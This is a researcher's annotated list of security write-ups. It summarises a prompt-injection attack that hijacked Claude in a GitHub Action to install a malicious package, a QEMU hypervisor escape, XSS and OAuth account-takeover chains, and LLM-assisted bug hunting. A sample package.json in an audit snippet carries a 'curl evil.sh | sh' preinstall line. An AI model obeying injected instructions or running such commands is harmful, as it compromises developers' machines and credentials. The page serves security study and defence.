Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

A GitHub Issue Title Compromised 4,000 Developer Machines- 1925

grith.ai    Reference →Posted 3 Days Ago
  • Cline is a CLI npm package that provides a simple AI assistant. Recently, it experienced a supply chain compromise via a unique prompt-injection bug.
  • The package used the GitHub Action claude-code-action to trigger workflows when users create an issue. This executed some code in the repository's context, but not much else is said. The issue title and description were passed directly to Claude, which allowed a crafted title to hijack Claude's actions.
  • The AI bot was instructed to install a malicious npm package. Claude did what it was told and installed the typo-squatted package glthub-actions/cline. This fork of the regular package contained a package.json with a preinstall script that executed a remote shell.
  • The attacker then used the bash tool Cacheract to poison the cache. In particular, this tool can be used to persist information in the build pipeline. So, during a daily release Action, the intended build was not the one that ran; the poisoned one was. Using these privileges, they stole the NPM_RELEASE_TOKEN and several other tokens.
  • The npm token was used to publish the malicious npm module. The poisoned Cline version shipped a script that installed OpenClaw via a postinstall hook. The version was only live for 14 minutes before StepSecurity identified the issue, and it was fully removed within 8 hours.
  • The story gets crazier, though: the maintainers attempted to rotate the stolen credentials but deleted the WRONG token. So, the token remained active long enough for a new malicious version to be deployed 6 days later. Apparently, the bug had been reported to the project by Adnan Khan in December of 2025, but it was never acknowledged. A threat actor found the PoC on his test repository and exploited the bug themselves.
  • How StepSecurity caught this so fast is fascinating. First, the publish differed from normal patterns: the project usually used OIDC trusted publishing instead of human publishing. Next, legitimate releases carry attestations to verify the package's legitimacy, which were also absent. Finally, the postinstall script was malicious and made no sense in this context.
  • StepSecurity included a few steps for enterprise customers to protect themselves. First, use a cooldown period so that newly published package versions aren't consumed immediately. They also have a GitHub Actions runner hardening process that makes this kind of attack more difficult to pull off.
  • Cline took the exploit seriously and made some changes. First, they disabled caching where credentials are used. Next, they started using provenance attestations for npm publishing. Finally, they improved their security process with SLAs, verification requirements on credential rotation, and third-party audits of the infra. Going forward, I expect to see more of these completely automated flows getting compromised like this.
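The preinstall vector described above is easy to audit for. Here's a minimal sketch of such a check (the helper name and sample manifests are my own, but the lifecycle script fields are npm's standard ones):

```python
import json

# npm runs these lifecycle scripts automatically on `npm install`,
# which is what let the poisoned fork's payload fire without any user action.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

def find_install_hooks(package_json_text: str) -> list[str]:
    """Return the install-time lifecycle scripts a package declares."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    return [hook for hook in INSTALL_HOOKS if hook in scripts]

# A manifest shaped like the malicious fork described above (illustrative).
suspicious = '{"name": "example", "scripts": {"preinstall": "curl evil.sh | sh"}}'
clean = '{"name": "example", "scripts": {"test": "jest"}}'
```

A hook being present isn't proof of malice, but combined with StepSecurity's other signals (no OIDC trusted publishing, no attestations) it's a strong tell.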

EVM Research- 1924

evmresearch    Reference →Posted 3 Days Ago
  • A curated list of resources on how the EVM functions and security patterns.

Improving Skill-creator: Test, measure and redefine Agent Skills- 1923

Anthropic     Reference →Posted 3 Days Ago
  • Claude classifies skills into two buckets: capability uplift and encoded preference. The former gets Claude to perform actions that it cannot do by itself; the latter is something Claude can already do, done according to a specific process. The difference between these changes the way they are evaluated.
  • The skill-creator helps write tests that check that Claude did what you expected for a given prompt, similar to software tests. This is important for A) understanding the capabilities, B) catching regressions and C) detecting whether the base model has outgrown the skill. The metrics show the time, the pass/fail rate and the number of tokens used. All really important evals! This now has A/B testing too.
  • Another new aspect of skill-creator is tuning the descriptions so that Claude automatically triggers them at the proper times. Overall, a good post on a feature I had no idea about for improving Claude skills.
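The metrics mentioned above (time, pass/fail rate, tokens) can be modeled with a tiny summary function; the field names here are illustrative, not Anthropic's:

```python
# A minimal model of skill-eval metrics: each run records whether the
# check passed, wall-clock time, and tokens consumed.
def summarize(runs: list[dict]) -> dict:
    passed = sum(1 for r in runs if r["passed"])
    return {
        "pass_rate": passed / len(runs),
        "avg_seconds": sum(r["seconds"] for r in runs) / len(runs),
        "avg_tokens": sum(r["tokens"] for r in runs) / len(runs),
    }

runs = [
    {"passed": True,  "seconds": 12.0, "tokens": 900},
    {"passed": True,  "seconds": 8.0,  "tokens": 700},
    {"passed": False, "seconds": 20.0, "tokens": 1400},
]
```

Tracking these per skill version is what makes the regression-catching and "has the base model outgrown this skill" questions answerable.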

Lessons from Building Claude Code: How We Use Skills - 1922

trq212 - Anthropic    Reference →Posted 3 Days Ago
  • Claude Skills are becoming bigger and bigger. This article details how to write good Claude skills, from people using them internally at Anthropic. They break it down into nine different categories: library API references, production verification, data/analysis, business automation, scaffolding/templates, code review, CI/CD deployment, incident runbooks and infrastructure ops.
  • The first tip is to NOT state the obvious. If something is a default, then Claude already knows it. Skills that improve on Claude's base knowledge, refined through trial and error, are great. Another item is a basic gotchas section: common failure points that Claude runs into when using the skill; these should be updated over time.
  • Claude skills aren't just markdown files anymore; they are a folder of information. You can tell Claude what files are in a skill and when to read specific information. This progressive disclosure limits the usage of context while giving Claude all of the information that it needs. Some skills include built-in memory by having log files, JSON files or even a SQLite database.
  • Giving Claude scripts and libraries to use can make it even more powerful. This is great for complex analysis, custom calls that are required, and much more. Hooks are code that is always run at deterministic times. The more deterministic Claude can be with user-created code, the better.
  • They also say to be careful about being too prescriptive. Claude is smart and can adapt to many situations. Their example of being too prescriptive is having step-by-step instructions for simple tasks. A good article on using Claude skills more effectively.
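The built-in memory idea mentioned above (log files, JSON, or even SQLite) can be sketched as a tiny append-only store that a skill's scripts maintain between sessions. The schema and function names here are my own, not from the article:

```python
import sqlite3

def open_memory(path: str = ":memory:") -> sqlite3.Connection:
    """Open (or create) a skill's persistent memory store."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS notes ("
        "  ts   TEXT DEFAULT CURRENT_TIMESTAMP,"
        "  note TEXT NOT NULL)"
    )
    return conn

def remember(conn: sqlite3.Connection, note: str) -> None:
    conn.execute("INSERT INTO notes (note) VALUES (?)", (note,))
    conn.commit()

def recall(conn: sqlite3.Connection, limit: int = 5) -> list[str]:
    """Most recent notes first, for cheap progressive disclosure."""
    rows = conn.execute(
        "SELECT note FROM notes ORDER BY rowid DESC LIMIT ?", (limit,)
    ).fetchall()
    return [r[0] for r in rows]

conn = open_memory()
remember(conn, "deploy requires VPN")
remember(conn, "use staging DB for tests")
```

In a real skill the path would be a file inside the skill folder, so the gotchas Claude learns survive across conversations.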

<iframe> Sandbox Bypass, Cross-Origin Drag-Drop, Unvalidated postMessage origin, Cookie Bomb to Account Takeover- 1921

Renwa    Reference →Posted 3 Days Ago
  • The author of this post was reviewing a target that had an interactive playground for developers to write and evaluate JavaScript against a developer API. This is a great attack surface to target! Sometimes, the vulnerability is the attack surface.
  • The application attempts to sandbox the user's JavaScript execution by creating a separate iframe and running the code in there. However, the iframe didn't have the sandbox attribute, despite living in a div and having a name that contained "sandbox". This means the iframe is considered same-origin and can access content within the parent page.
  • The iframe creation sets the src via data:text.... Normally, this would mean it has the null origin. Luckily for the author, the page calls document.open() and document.write() on the iframe's document before the URI loads! This means the iframe inherits the parent's origin. In practice, any code injected into the textarea is evaluated on the full origin of the target site. This creates DOM XSS, but they needed a remote way to exploit it.
  • How do we get a user to add this payload? The author has many posts on weaponizing drag-and-drop across windows. When a user starts dragging an element on Page A, which then redirects to Page B, the drag action persists across windows. To exploit this, an attacker can host a page with an attractive draggable image, set the drag data to an XSS payload, redirect to the victim page, and when the user releases the drag, it drops right into the code editor. This works on Firefox and Safari; on Chrome, it requires a popup instead of a redirect.
  • Even with the drag-and-drop exploit, the victim still needs to click Evaluate. Luckily for them, there's a postMessage handler that doesn't check the origin, so any cross-origin window is able to trigger Evaluate on the editor. With this, they can achieve full XSS with some user interaction. The chain is a drag-n-drop switcheroo that lands an XSS payload in the parent page, triggered by a postMessage.
  • Full XSS wasn't enough; they wanted an account takeover. The website used OAuth for logging in. They prevented the OAuth callback from completing server-side by using a cookie bomb to trigger a 431 error. Now, the authorization code sits UNUSED in the URL. Using this authorization code leads to a complete account takeover.
  • This is a crazy chain of bugs! It does require a drag-and-drop, so the triager on the bug bounty program said it requires too much interaction. Still, the techniques used are pretty awesome and I learned a lot about client-side security from this post. Great write-up!
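The root cause, an iframe that is named like a sandbox but lacks the actual sandbox attribute, is the kind of thing you can grep for. A rough audit sketch using Python's stdlib HTML parser (a heuristic, not a complete same-origin analysis):

```python
from html.parser import HTMLParser

class IframeAudit(HTMLParser):
    """Flag iframes with no sandbox attribute: without it, a same-origin
    (or document.write-initialized) frame can reach the parent page,
    exactly as in the playground bug above."""

    def __init__(self) -> None:
        super().__init__()
        self.unsandboxed: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            attr_names = {name for name, _ in attrs}
            if "sandbox" not in attr_names:
                self.unsandboxed.append(dict(attrs).get("name", "?"))

audit = IframeAudit()
# A frame *named* like a sandbox but missing the attribute (illustrative markup).
audit.feed('<div><iframe name="js-sandbox" src="about:blank"></iframe></div>')
audit.feed('<iframe name="safe" sandbox="allow-scripts"></iframe>')
```

The fix on the target would have been the attribute itself: `sandbox` (without `allow-same-origin`) forces the frame into a unique opaque origin regardless of how its document is initialized.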

From virtio-snd 0-Day to Hypervisor Escape: Exploiting QEMU with an Uncontrolled Heap Overflow- 1920

OtterSec    Reference →Posted 3 Days Ago
  • QEMU is a machine emulator and virtualizer that lets a host system run guest operating systems of any architecture. For this post, they decided to review virtio devices because they require an interface with the host operating system. virtio-snd device buffers are stored in a FIFO linked list after being popped from the virtqueue.
  • In virtio_snd_handle_rx_xfer() there is code for computing the proper size to use. This takes the size of a buffer and subtracts the size of a struct from it. However, this calculation can underflow given a small buffer, yielding the first bug. In virtio_snd_pcm_in_cb() the usage of a buffer vs. its allocation is slightly off: the allocation size and the bounds check differ by 8 bytes, allowing an 8-byte OOB write. The final bug was a missing bounds check in an edge case of user-provided values, creating another OOB write because the actual buffer allocation size wasn't taken into account.
  • The exploit focuses on the third bug because it provides the largest overflow. Each of these bugs is in the audio input path coming from the host side, so the OOB write is effectively random. What can we even do with a write of uncontrolled data? Their initial idea was to overwrite a size field of some data structure within QEMU, but they couldn't find a suitable target. So, they targeted glibc's heap allocator itself, corrupting the size of a tcache-bin-sized chunk. This allowed them to free a chunk with an oversized entry into the tcache freelist.
  • To perform a heap spray and get a better allocation primitive, they used the paravirtualized filesystem device virtio-9p. With each P9_TXATTRCREATE, a host-side buffer is allocated with a name and value field, where the size is arbitrarily controlled. It can be written to and read back later. An on-demand allocation with a chosen size, fully controllable contents and the ability to free as needed: this is perfect for heap exploitation!
  • To use the corruption, they fill up the bins and flush them continuously. Eventually, a write will land on the size field of a 0x200-sized chunk, making it LARGER than the intended size. Once this is freed into the 0x210-0x2f0 bin, it's over-allocated. After returning this chunk, a write to it will corrupt the size of the FOLLOWING chunk with a user-controlled value of 0x400. Now, the chunk completely overlaps the chunk ahead of it. This is a super useful state to be in.
  • To get a heap leak, they use the tcache free list fd pointer. When it's the only entry in the list, safe linking is effectively useless because the pointer is XORed with 0x00, losing only the final 12 bits. With this primitive, they write a controlled pointer into the fd slot and then read the memory. At this point, they can just reverse the XOR and read the slot. This effectively creates an encryption oracle to leak the bits out. Pretty neat!
  • Using the object V9fsFidState, they were able to produce an arbitrary read/write from the tcache poisoning primitive. By allocating an overlapped chunk on top of this object, there is a pointer that is directly controllable. This can be used for both reads and writes, which is effectively game over at this point.
  • This bug sat in the codebase for over 2 years but was fixed the same week that OtterSec found it. Still, this is a great example of turning a small bug into something much larger with cascading improvements to exploitability. Great post!
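The first bug class, an unsigned size calculation that underflows when the buffer is smaller than the header struct, can be reproduced in miniature. The sizes below are made up for illustration; the real fields live in virtio_snd_handle_rx_xfer():

```python
# QEMU's device code does this arithmetic on unsigned C types; emulate
# 32-bit unsigned wraparound explicitly with a mask.
U32_MASK = 0xFFFFFFFF
HDR_SIZE = 8  # illustrative header-struct size, not the real one

def payload_size(buf_size: int) -> int:
    """size = buf_size - sizeof(header), as unsigned 32-bit math.
    A buffer smaller than the header wraps to a huge value instead of
    failing, which is exactly the underflow described above."""
    return (buf_size - HDR_SIZE) & U32_MASK
```

A 4-byte buffer yields roughly 4 GiB of "payload", which downstream code then happily uses as a copy length.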

When PKCE Doesn't Protect You: Bypassing OAuth Code Exchange- 1919

labs.trace37    Reference →Posted 3 Days Ago
  • In a previous blog post, they discussed a vulnerability in an authentication flow that was broken through bad frame communication. One of the issues that made this possible is discussed in depth in this blog post.
  • OAuth Proof Key for Code Exchange (PKCE) is an extension to the authorization flow used to prevent code interception and injection attacks. The calling application creates a secret that is later verified by the authorization server. The client generates the challenge as a SHA-256 hash of that secret and sends it to the server for later use.
  • The authorization code returned by the SSO is bound to whatever codeChallenge was in the URL when the SSO page loaded. The parent page generates the PKCE secret and includes the challenge as part of the SSO URL. This is a problem though: the challenge must be freshly generated and unique to the request! If an attacker can set it, then it bypasses the entire purpose of PKCE.
  • A good quote from the author: "PKCE protects the code in transit. It does NOT protect against an attacker who controls the authorization request itself." Understanding what a security control does and doesn't protect against is crucial. Great spot to finish off the chain!
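For reference, the S256 challenge derivation PKCE relies on is just a base64url-encoded SHA-256 of the verifier with padding stripped (RFC 7636). The point of the bug above is that the legitimate client must be the one generating the verifier; the math itself is simple:

```python
import base64
import hashlib
import secrets

def make_verifier() -> str:
    # 32 random bytes -> a 43-character base64url verifier, per RFC 7636.
    return base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()

def s256_challenge(verifier: str) -> str:
    """code_challenge = BASE64URL(SHA256(ASCII(code_verifier)))."""
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()
```

The hash is one-way, so an eavesdropper who sees the challenge can't redeem the code; but an attacker who *supplies* the challenge already knows its verifier, which is exactly the failure mode this post describes.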

Hijacking the Channel: Zero-Click Account Takeover via MessagePort Injection- 1918

labs.trace37    Reference →Posted 3 Days Ago
  • Web pages are intentionally isolated from one another. It would be insecure if another website could read the contents of your page or use your cookies to retrieve sensitive information. So, browsers prevent these types of attacks with features like the same-origin policy (SOP). Regardless, it is still important to allow some cross-website communication.
  • The most common way is postMessage. A lesser-known mechanism is the MessageChannel API. This creates a private, bidirectional communication pipe between two contexts. Once a MessagePort is transferred, the channel is considered secure. This functionality was used on an SSO login embedded within an iframe to deliver OAuth authorization codes to the parent application.
  • With postMessage, it's common to miss an origin check. MessageChannel works differently: you create a channel with two ports, send one of the ports to another page, and use the other port yourself. There's no need to verify the origin because the channel is inherently private. So, how does the other page get its port? postMessage, of course!
  • The flow for logging in worked as follows:
    1. A first-party application, such as an online store, embeds the SSO login page in an iframe.
    2. SSO iframe broadcasts readiness to its parent via postMessage(). The parent responds with a MessagePort.
    3. User authenticates in the iframe. On success, the SSO provider sends the auth code via the MessagePort.
    4. The parent exchanges the code for a JWT session via server-side calls.
  • This flow was reasonably solid but had a few subtle issues. First, there was no framing protection on the SSO login pages, making it possible for an attacker to play the parent frame. Second, the postMessage carrying the port used * as the target origin, and the sender's origin wasn't being validated either. In practice, this means that the first submitted port wins.
  • The attack works by first hosting a page on any domain that embeds the SSO login page in an iframe. When the SSO iframe broadcasts that it's ready, the attacker creates a message channel and sends their port to the iframe. This lets the attacker's website take the place of the legitimate site in the communication with the SSO iframe. This leads to intercepting the auth code, and thus an account takeover.
  • The vulnerability is awesome! I also enjoyed the discussion of the threat model. However, I thought the framing of the bug was a little extreme and degrading. The constant use of the word failure, wrong, broke... if we want security to get a better rep, it needs to be more constructive imo. Also, if you have to click on a website link, then it's not zero-click.
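The "first submitted port wins" flaw can be modeled as a tiny state machine (this is my own toy model, not the vendor's code): the fix is to validate the sender's origin before adopting a port and ignore anything after the first adoption.

```python
class PortBroker:
    """Toy model of the SSO iframe's port-adoption logic."""

    def __init__(self, allowed_origin: str, validate: bool) -> None:
        self.allowed_origin = allowed_origin
        self.validate = validate      # False models the vulnerable behavior
        self.adopted = None           # origin whose MessagePort we will use

    def on_message(self, sender_origin: str) -> None:
        if self.adopted is not None:
            return  # first port wins; later ports are ignored
        if self.validate and sender_origin != self.allowed_origin:
            return  # patched behavior: reject foreign origins
        self.adopted = sender_origin

# Vulnerable: the attacker's page races the real parent and wins.
vulnerable = PortBroker("https://shop.example", validate=False)
vulnerable.on_message("https://attacker.example")
vulnerable.on_message("https://shop.example")

# Patched: the foreign origin is rejected, the real parent gets the channel.
patched = PortBroker("https://shop.example", validate=True)
patched.on_message("https://attacker.example")
patched.on_message("https://shop.example")
```

Combined with framing protection (so an attacker can't embed the SSO page at all), either defense alone would have broken this chain.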

Needle in the haystack: LLMs for vulnerability research- 1917

Devansh    Reference →Posted 4 Days Ago
  • The author of this post found several vulnerabilities purely using LLMs. In this post, they outline some takeaways from the hundreds of prompts they have used. To start with, they debunk an intuition: more data isn't necessarily better. LLMs have a recency bias and suffer from context rot. Providing too much context, overly-scaffolded chaining of prompts, and bloated SKILLS.md files hurts the process.
  • They start from the beginning: why can't you just say "LLM, find me bugs"? The first issue is that LLMs don't have a notion of impact, so they end up with a nonsensical threat model. Without clear trust boundaries, the model does a horrible job. Second, general prompts get general answers: the model will pattern-match common bug classes and not go very deep. Threat modeling is the ultimate form of context compression.
  • The process for creating a good threat model drew on prior CVEs: list several previously discovered bugs and how they were triggered. From this threat model, they created plausible bug classes to review the codebase for. On ParseServer, the LLM identified an interesting trust boundary with multiple keys at different privilege levels. After surveying the code, they identified that several handlers gate access on isMaster() without checking isReadOnly(). With a narrower prompt focusing on this, they found 3 bugs, plus a fourth in a JWT aud claim lacking verification.
  • In the HonoJS library, they reviewed the JWT verification flow. They gave it previous CVEs and general JWT implementation vulnerabilities. From there, they asked the LLM to identify high-risk areas, which it identified as algorithm confusion and default fallback behavior. With some direction, they scanned for the specific flaws, and the LLM surfaced two concerning patterns. Finally, they asked under what exact conditions these vulnerabilities could be triggered. This popped out two classic algorithm confusion bugs.
  • On ElysiaJS, the LLM flagged secrets rotation as sketchy. After further digging, the LLM found that a Boolean initialization error caused signature validation checks to never fail during secrets rotation. On harden-runner, a GitHub Actions tool for preventing data exfiltration, it found several gaps in the syscall filtering that allowed data to be exfiltrated. On a similar product called BullFrog, they identified three distinct bypasses via similar methods.
  • Finally, in Better-Hub, an alternative GitHub frontend, they found six XSS variants, all stemming from unsanitized Markdown. One of the rabbit holes was caching, which led to two authorization bypasses leaking private repository content. Instead of deriving the threat model from other data, they described it themselves. The LLM helped find high-risk areas with the prompt "What happens when user-controlled content is rendered unsafely in a context that has access to stored credentials?"
  • None of these code reviews had a giant checklist, huge scaffolding or anything else. They started with a simple threat model that identified sections of codebases that had security-critical operations. From there, they let the LLM focus heavily on that section of code and try to violate various security invariants. The claim here is twofold: use threat models and pick small yet sensitive slices of the codebase to find bugs.
  • They have a few general tips for prompting. First, assert that vulnerabilities exist; this matters because LLMs have been trained to be agreeable. Relatedly, applying search pressure by saying a vulnerability has already been found makes the model much more likely to find issues, and telling it to assume that developers make mistakes, rather than rationalizing the code, helps as well. Second, ask for the exploit, not an assessment; this forces the model to produce a concrete, testable input to trigger the bug.
  • LLMs are very good at comparative analysis: they can leverage their training data on known patterns to find bugs. Another tip is not settling on the first answer; you can ask for more with different criteria, and a simple "what else" can be useful. The final tip they give is constraining how the application can be attacked, for instance stating that the attacker is remote and unauthenticated. This eliminates many false positives and helps the model stay focused.
  • This was a fantastic post that is definitely going against the grain. In this case, the author was in the loop the whole time, instead of having an agent do everything. Less context and more focus seem to be the general theme of this post.
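The prompting tips above (assert a bug exists, apply search pressure, demand an exploit, constrain the attacker model) compose naturally into a template. This is my own sketch of such a prompt builder, not the author's:

```python
def build_review_prompt(component: str, attacker: str, invariant: str) -> str:
    """Compose a focused vuln-hunting prompt using the tips above:
    assertive framing, a concrete attacker model, and a demand for a
    testable exploit rather than a vague assessment."""
    return (
        f"A vulnerability has already been found in {component}; "
        f"developers make mistakes, so do not rationalize the code. "
        f"Assume a {attacker}. "
        f"Find an input that violates this invariant: {invariant}. "
        f"Respond with a concrete, testable exploit input, not an assessment."
    )

prompt = build_review_prompt(
    "the JWT verification flow",
    "remote unauthenticated attacker",
    "tokens signed with the wrong algorithm are rejected",
)
```

The constrained attacker model and the named invariant do most of the work here; they are the "context compression" the post argues for, versus dumping the whole repo into the window.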

The 2026 Global Intelligence Crisis- 1916

Citadel Securities - Frank Flight    Reference →Posted 4 Days Ago
  • The end of knowledge work has been claimed to be here with AI tooling. Will this mean working fewer hours? Universal basic income? There are many questions about what the world will look like in 5 years. Citadel pulls back the curtain of history to discuss what may happen.
  • The first thing they point out is that improvements in AI technology don't mean adoption. From August of 2024 to November of 2025, despite major improvements in tooling, adoption barely increased. As the pace of adoption slows, the risk of displacement declines. The cost of integrating early is expensive compared to those who come later. There's also a major question of cost: if white-collar work is cheaper than the compute required to replace it, then the workers will be used.
  • AI productivity is a supply shock. It lowers marginal costs, expands potential output, and increases income. Every major technological advancement, from steam power to electricity to computers, has followed this pattern. The counterargument is that AI replaces people, thereby dramatically lowering costs. In reality, lower prices increase purchasing power and consumption. A world where productivity surges but demand collapses violates basic accounting.
  • For situations with coordination friction, liability constraints, and trust barriers, AI will be a complement rather than a substitute. Historically, technological revolutions have changed the tasks performed rather than eliminated labor altogether. For negative demand for labor to occur, it would require the total automation of everything. For instance, did Microsoft Office help office workers, or did it make them obsolete?
  • In 1930, John Maynard Keynes thought that productivity growth would be so great that the workweek would fall to 15 hours. In reality, people work MUCH more. Rising productivity lowers costs and expands the consumption frontier! Leisure increased modestly, but material aspiration expanded far more. Humans' wants are too large for there to be a limit.
  • Overall, I appreciated the review of the history of productivity increases and its comparison to AI. These waves have offset other issues and kept the economy advancing by 2%. Thanks for the perspective.